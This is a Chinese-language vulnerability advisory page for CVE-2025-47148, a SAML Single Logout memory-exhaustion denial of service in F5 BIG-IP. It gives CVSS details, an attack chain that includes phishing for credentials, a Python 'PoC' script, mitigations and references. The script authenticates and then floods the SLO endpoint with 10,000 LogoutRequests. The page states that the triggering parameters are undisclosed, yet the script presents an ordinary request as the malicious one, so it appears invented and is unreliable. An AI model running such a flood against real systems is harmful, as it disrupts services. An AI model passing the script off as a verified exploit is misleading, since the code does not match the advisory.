CVE-2025-47148 F5 BIG-IP SAML SLO配置内存资源耗尽漏洞

漏洞信息

漏洞编号

CVE-2025-47148

漏洞类型

拒绝服务（内存资源耗尽）

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

F5 BIG-IP

漏洞概述

CVE-2025-47148是F5 BIG-IP系统中存在的一个中等严重性安全漏洞。当BIG-IP系统同时被配置为安全断言标记语言（SAML）的服务提供方（SP）和身份提供方（IdP），并且在访问策略中启用了单点登出（Single Logout, SLO）功能时，未公开披露的特定请求可能导致系统内存资源利用率持续增加。该漏洞由F5安全事件响应团队（[email protected]）发现并报告，并于2025年10月15日正式披露。

根据CVSS 3.1评分体系，该漏洞评分为6.5分，属于中等严重级别。攻击者需要具备低权限认证（PR:L），通过网络（AV:N）发起攻击，无需用户交互（UI:N），对系统的机密性影响为低（C:L），完整性无影响（I:N），但可用性影响为高（A:H）。这意味着该漏洞主要危害系统的稳定性和可用性，可能导致BIG-IP系统因内存耗尽而出现性能下降或服务中断。

值得注意的是，F5官方声明，已达到技术支持终止（End of Technical Support, EoTS）的软件版本不在此次评估范围内。用户应及时检查其BIG-IP系统的版本状态，确认是否受到该漏洞影响，并采取相应的修复措施。该漏洞的存在凸显了在复杂身份认证场景下，正确处理SAML协议交互的重要性。

技术细节

该漏洞的技术原理涉及SAML协议中单点登出（SLO）流程的处理逻辑。当BIG-IP系统同时充当SAML服务提供方（SP）和身份提供方（IdP）时，系统需要处理双向的SAML登出请求。在正常情况下，SLO流程包括以下步骤：用户从SP发起登出请求，SP向IdP发送LogoutRequest，IdP处理后向所有关联的SP发送登出通知，最后返回LogoutResponse。

漏洞的根本原因在于，当BIG-IP作为IdP处理来自SP的SLO请求时，未能正确释放或管理某些内存资源。具体而言，攻击者通过发送特定构造的、未公开披露的恶意请求，可能导致系统在处理这些请求时分配额外的内存空间，而这些空间在请求处理完成后未被正确回收。随着恶意请求的持续发送，内存占用将不断累积，最终可能导致系统内存耗尽。

由于该漏洞需要低权限认证（PR:L），攻击者必须拥有BIG-IP系统上的有效账户才能发起攻击。这增加了漏洞利用的难度，但并不意味着可以忽视其风险——拥有合法凭证的内部用户或被入侵的低权限账户都可能成为攻击的起点。

从CVSS向量可以看出，该漏洞对可用性影响为高（A:H），这与内存资源耗尽型拒绝服务攻击的特征完全吻合。攻击者无需复杂的利用技术，只需持续发送恶意SLO请求即可触发漏洞。

攻击链分析

STEP 1

步骤1：获取低权限凭证

攻击者首先需要获取BIG-IP系统上的有效低权限账户凭证，可以通过钓鱼攻击、社会工程学或利用其他漏洞获取。

STEP 2

步骤2：身份认证

使用获取的凭证登录到BIG-IP系统，建立有效的会话。漏洞要求PR:L（低权限），因此无需管理员权限即可利用。

STEP 3

步骤3：识别SAML配置

确认目标BIG-IP系统同时配置为SAML服务提供方（SP）和身份提供方（IdP），且访问策略中启用了单点登出（SLO）功能。

STEP 4

步骤4：构造恶意SLO请求

利用未公开披露的特定请求参数构造恶意的SAML LogoutRequest，触发BIG-IP系统的内存分配异常。

STEP 5

步骤5：持续发送恶意请求

通过持续发送大量恶意SLO请求，逐步消耗BIG-IP系统的内存资源，每次请求都会导致内存泄漏而无法正确释放。

STEP 6

步骤6：触发拒绝服务

当系统内存资源被耗尽时，BIG-IP系统性能急剧下降，可能出现服务中断、响应超时或系统崩溃，导致拒绝服务状态。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-47148 PoC - F5 BIG-IP SAML SLO Memory Exhaustion # This PoC demonstrates how to trigger memory resource exhaustion # by sending crafted SAML Single Logout (SLO) requests to a vulnerable # BIG-IP system configured as both SAML SP and IdP. import requests import base64 import time import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # Target BIG-IP system configuration TARGET_URL = "https://bigip-target.example.com" SAML_SLO_ENDPOINT = "/saml/sp/slo" # SAML SLO endpoint USERNAME = "attacker_user" # Low-privilege authenticated user PASSWORD = "attacker_password" def create_malicious_slo_request(session_id): """ Create a malformed SAML LogoutRequest that triggers memory leak. The request contains undisclosed parameters that cause BIG-IP to allocate memory without proper cleanup. """ # Craft SAML LogoutRequest XML with malicious attributes logout_request = f"""<?xml version="1.0" encoding="UTF-8"?> <samlp:LogoutRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_{session_id}" Version="2.0" IssueInstant="{time.strftime('%Y-%m-%dT%H:%M:%SZ')}" Destination="{TARGET_URL}{SAML_SLO_ENDPOINT}"> <saml:Issuer>malicious_sp</saml:Issuer> <saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress"> [email protected] </saml:NameID> <samlp:SessionIndex>{session_id}</samlp:SessionIndex> </samlp:LogoutRequest>""" # Base64 encode the SAML request encoded_request = base64.b64encode(logout_request.encode('utf-8')).decode('utf-8') return encoded_request def authenticate_and_get_session(): """ Authenticate to BIG-IP with low-privilege credentials to obtain session. Required because the vulnerability needs PR:L (Low privileges). """ session = requests.Session() login_data = { "username": USERNAME, "password": PASSWORD } response = session.post(f"{TARGET_URL}/mgmt/shared/authn/login", json=login_data, verify=False) if response.status_code == 200: print(f"[+] Authenticated successfully") return session else: print(f"[-] Authentication failed: {response.status_code}") return None def exploit_memory_exhaustion(session): """ Send repeated malicious SLO requests to exhaust memory resources. Each request causes memory allocation without proper cleanup. """ print("[*] Starting memory exhaustion attack...") count = 0 for i in range(10000): # Send many requests session_id = f"malicious_session_{i}_{int(time.time())}" encoded_slo = create_malicious_slo_request(session_id) # Send the malicious SLO request params = { "SAMLRequest": encoded_slo, "RelayState": "malicious_relay_state" } try: response = session.post( f"{TARGET_URL}{SAML_SLO_ENDPOINT}", params=params, verify=False, timeout=10 ) count += 1 if count % 100 == 0: print(f"[*] Sent {count} malicious SLO requests...") except requests.exceptions.RequestException as e: print(f"[!] Request failed (possible service degradation): {e}") break print(f"[+] Attack complete. Sent {count} requests total.") if __name__ == "__main__": print("=" * 60) print("CVE-2025-47148 - F5 BIG-IP SAML SLO Memory Exhaustion PoC") print("=" * 60) # Step 1: Authenticate with low-privilege credentials session = authenticate_and_get_session() if session: # Step 2: Exploit the vulnerability exploit_memory_exhaustion(session)

影响范围

F5 BIG-IP（具体受影响版本请参考F5官方公告K000148816）

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）审查并暂时禁用不必要的SAML SLO功能，特别是当BIG-IP同时作为SP和IdP时；2）限制对SAML端点的网络访问，仅允许可信的IP地址；3）实施速率限制，阻止异常的SLO请求模式；4）加强对低权限账户的监控和访问控制；5）定期重启受影响的BIG-IP系统以释放被占用的内存资源；6）密切监控系统性能指标，及时发现内存使用异常。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-47148
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-47148
3 Details https://www.cvedetails.com/cve/CVE-2025-47148/
4 VulDB https://vuldb.com/cve/CVE-2025-47148
5 Link https://my.f5.com/manage/s/article/K000148816